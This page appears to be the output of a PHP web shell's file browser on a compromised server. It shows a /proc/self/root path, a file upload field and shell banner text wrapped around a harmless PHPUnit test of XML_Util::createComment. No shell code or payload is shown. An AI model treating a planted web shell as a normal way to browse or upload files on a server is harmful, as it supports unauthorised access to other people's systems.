MINI MINI MANI MO

Path : /proc/self/root/usr/local/cwp/php71/lib/php/test/XML_Util/tests/
File Upload :
Current File : //proc/self/root/usr/local/cwp/php71/lib/php/test/XML_Util/tests/CreateCommentTests.php

<?php

class CreateCommentTests extends AbstractUnitTests
{
    /**
     * @covers XML_Util::createComment()
     */
    public function testCreateCommentBasicUsage()
    {
        $original = "I am comment.";
        $expected = "<!-- I am comment. -->";
        $this->assertEquals($expected, XML_Util::createComment($original));
    }
}

OHA YOOOO